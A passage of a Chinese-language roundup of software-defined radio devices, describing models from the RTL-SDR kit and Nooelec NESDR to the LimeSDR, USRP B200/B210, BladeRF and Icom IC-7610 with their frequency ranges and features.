RTL-SDR BLOG V3 R820T2 RTL2832U 1PPM TCXO HF校准Tee SMA软件定义无线电与偶极天线套件

RTL-SDR是完美的预算软件无线电，适用于许多应用，例如通用无线电扫描，空中交通管制，公共安全，ADS-B飞机雷达，ACARS，中继无线电，P25 / MotoTRBO数字语音，POCSAG，气象气球， APRS，NOAA APT /流星M2气象卫星，射电天文学，DAB。
该RTL-SDR无线电套件包括天线和其他有用的外围设备。根据您对软件无线电的熟悉程度，您可能还需要获取此信息丰富的RTL-SDR指南的副本。
4. Nooelec NESDR SMArt v4，带有铝制外壳

带有铝制外壳的Nooelec NESDR SMArt SDR
Nooelec NESDR SMArt是一种高级SDR，能够接收25MHz至1.7GHz的RF信号。SDR无线电的设计使其在运行时几乎不受相邻USB兼容设备（如Raspberry Pi）的干扰。
该Nooelec Radio与上面的捆绑软件相似，但是缺少上变频器（以及较高的价格）。这种廉价的SDR钻机的另一个优点是它包含具有0.5PPM稳定性的超低相位噪声TCXO。
5. ADALM-Pluto SDR软件定义无线电主动学习模块PlutoSDR

模拟设备ADALM-Pluto SDR软件定义的无线电主动学习模块PlutoSDR
ADALM-Pluto SDR是沉重的打击者，对于那些正在寻找能够发送和接收无线电软件的人们来说，这是一个不错的选择。ADAML-Pluto比此列表中的其他一些SDR较新，因此没有足够丰富的支持此广播的生态系统。以下是ADALM-Pluto SDR的一些功能：
基于ADI公司的AD9363 –高度集成的RF敏捷收发器和Xilinx Zynq Z-7010 FPGA
便携式独立式RF学习模块具成本效益的实验平台
从325 MHz到3.8 GHz的RF覆盖范围。高达20 MHz的瞬时带宽。灵活的速率，12位ADC和DAC。一台发射机和一台接收机，半双工或全双工
MATLAB，Simulink支持。GNU Radio接收器和源块。libiio，一种C，C ++，C＃和Python API
带有Micro-USB 2.0连接器的USB 2.0供电接口高质量塑料外壳
6. SDRPlay RSPo双宽带1kHz-2GHz SDR接收器

SDRPlay RSPo软件定义无线电
SDRplay RSPo是一款出色的软件定义无线电选项，适合那些正在寻找可在Windows环境下工作的无线电的用户。SDRplay的RF频率范围为1kHz至2GHz。它还具有14位分辨率。该模型具有三个独立的天线输入，每个输入均可通过软件选择。SDRplay仅接收，但非常适合工业，科学和教育目的。使用可用的和记录的API，软件定义的无线电开发人员可以创建自己的解调器。说到好的文档，SDRplay越来越受欢迎，因此也有越来越多的用户提供支持。
SDRplay具有以下优点：
在两个完全独立的2MHz频谱窗口上同时接收1kHz至2GHz之间的任意值
通过2根天线同时进行处理，可实现测向，分集和降噪应用
覆盖从1kHz到VLF，LF，MW，HF，VHF，UHF和L频段至2GHz的所有频率，无间隙
一次接收，监视和记录高达10MHz的频谱（单调谐器模式）
用于同步目的的外部时钟输入和输出，或连接到GPS参考时钟
使用SDRuno校准的S表/ RF功率和SNR测量（包括数据记录到.CSV文件的功能）
便携式监控ISM / IoT /遥测频段<2GHz的理想选择
7. Great Scott Ubertooth套装

Great Scott Ubertooth
Great Scott Ubertooth One是流线型SDR，它是最小的封装之一，可以接收和发送高达2.4GHz的RF信号。套件包包括收音机，机壳和天线。
该应用程序软件直观易用，并且本机具有出色的接收器灵敏度和发射功率。该微控制器基于ARM Cortex-M3，可实现全速USB 2.0。对于希望开发自定义Class 1设备的用户来说，Ubertooth One是一个很好的开发工具。Ubertooth是完全开源的（包括硬件和软件）。
8. Original LimeSDR

原始LimeSDR软件无线电开发板带宽61.44MHz板tzt-
对于那些只追求基本功能的人来说，原始的LimeSDR是一个非常受欢迎的选择。LimeSDR软件定义的无线电提供了100kHz至3.8GHz频率范围内的发送和接收功能。LimeSDR具有很宽的频率范围，可以发送和接收UMTS，LTE，GSM，LoRa，蓝牙，Zigbee，RFID和数字广播，仅举几例。
LimeSDR也很平易近人，有一个强大的开发人员社区和可以安装的“应用程序”，这要归功于在该通用软件定义无线电上运行的Snappy Ubuntu Core。
9. LimeSDR mini
制造商网站上的说明

LimeSDR-USB和Mini_1

LimeSDR和LimeSDR Mini是同一系列的无线电软件的成员。一个不能替代另一个。相反，它们是互补的。
简而言之，LimeSDR Mini是原始LimeSDR的更小，更便宜的版本。但是，它仍然发挥了很大的作用-LimeSDR Mini在其核心上使用了与LMS7002M相同的无线电收发器作为其同级产品。Mini拥有两个通道，而不是四个通道，并且根据普遍需求，还有SMA连接器而不是微型U.FL连接器，并具有英特尔的MAX 10 FPGA。
我们已经运送了成千上万的LimeSDR Mini板，以及数千个更大的LimeSDR板。两者都建立在相同的供应链，开发工具和社区上，从而使软件定义的无线电比以往任何时候都更易于访问。
10. USRP B205mini-i平台

USRP B205mini-i SDR平台
USRP B205mini-i SDR平台是一种超高性能SDR平台，能够发送和接收高达6GHz的信号。
USRP B205mini-i具有1个发送通道和1个接收通道，频率范围为70MHz至6GHz。高达56MHz的瞬时带宽允许宽带运行许多不同的波形。对于外部同步，可以使用10MHz外部参考时钟或1 PPS（每秒脉冲）参考来实现。
11. Ettus B200 SDR

Ettus-B200-SDR 软件定义无线电
USRP B200提供了一个完全集成的单板通用软件无线电外围设备平台，具有70 MHz – 6 GHz的连续频率覆盖范围。它专为低成本实验而设计，结合了可提供高达56MHz实时带宽的完全集成的直接转换收发器，开放且可重新编程的Spartan6 FPGA以及快速便捷的总线供电的SuperSpeed USB 3.0连接。对UHD（USRP硬件驱动程序）软件的全面支持使您可以立即开始使用GNU Radio进行开发，使用OpenBTS对自己的GSM基站进行原型制作，并将代码从B200无缝过渡到性能更高的行业级USRP平台。
12. Ettus B210 SDR

USRP B210（仅限主板）
USRP B210提供了一个完全集成的单板通用软件无线电外围设备（USRP™）平台，具有70 MHz – 6 GHz的连续频率覆盖范围。它专为低成本实验而设计，结合了AD9361 RFIC直接转换收发器，可提供高达56MHz的实时带宽，开放且可重新编程的Spartan6 FPGA，快速的SuperSpeed USB 3.0连接以及便捷的总线电源。对USRP硬件驱动程序（UHD）软件的全面支持使您可以立即开始使用GNU Radio进行开发，使用OpenBTS对自己的GSM基站进行原型设计，以及从USRP B210到高性能，行业就绪的USRP平台的无缝过渡代码。
13. BladeRF X40软件定义无线电

BladeRF X40软件定义无线电
开箱即用，bladeRF可以从300MHz调节到3.8GHz，而无需额外的板卡。通过诸如GNURadio（实时图像）之类的开源软件，bladeRF可以立即投入使用。凭借其灵活的硬件和软件，bladeRF可以配置为充当定制RF调制解调器，GSM和LTE微蜂窝，GPS接收器，ATSC发射器或蓝牙/ WiFi组合客户端，而无需任何扩展卡。所有的BladeRF主机软件，固件和HDL是开源的，可在GitHub上获得。
亮点：
全双工40MSPS 12位正交采样
出厂校准的VCTCXO在38.4 MHz的1 Hz范围内调谐
可拆帽式RF屏蔽层可提高系统灵敏度和隔离度
灵活的时钟架构，可实现任意采样率
GPIO扩展端口
SPI闪存可实现无头操作
使用XB-200转接板扩展了频率覆盖范围
典型的+ 6dBm TX功率
14.YARD Stick One SDR USB收发器

YARD Stick One SDR
YARD（另一个无线加密狗）Stick One是一款小型裸板SDR收发器，适用于1GHz以下的频率。该单元具有一个集成的接收放大器和发射放大器，以及一个用于为天线端口附件供电的集成偏置器。
该特定的捆绑包包括915MHz SMA天线。如果您正在寻找一款能够发送和接收流行的免许可证频段的低成本低成本收发器。
15. Icom IC-7610 HF / 50MHz 100W收发器

Icom IC-7610 HF / 50MHz 100W收发器-每个人都想要的SDR

新型IC-7610对全球的DXers和竞赛者来说，微弱的信号不再是挑战。将QSO放入日志或尝试其他时间的区别在于接收者的能力。即使存在更强的相邻信号，IC-7610中的高性能RMDR仍能够挑选出最微弱的信号。IC-7610引入了双射频直接采样接收器。这些接收器可达到100dB RMDR，可与其他顶级收发器相媲美。IC-7610还在7英寸彩色显示器上配备了高速，高分辨率，实时频谱示波器。
输出功率：100W（25W AM）
接收频率：0.030-60.00MHz
接收器类型：直接采样
射频直接采样系统
IC-7610采用RF直接采样系统，其中RF信号直接转换为数字数据，然后由FPGA（现场可编程门阵列）进行处理。此过程可减少在传统超外差接收机中发现的各种混频器级中自然发生的失真。
IC-7610中的RF直接采样系统具有110 dB * RMDR的能力。这种性能使您能够将弱信号从强相邻信号的噪声中拉出来。当所需的信号从堆积中出来时，您实际上可以听到一个差异！
小叔来啦：
看完之后，你是不是在选择SDR设备上有了更清晰的思路了呢？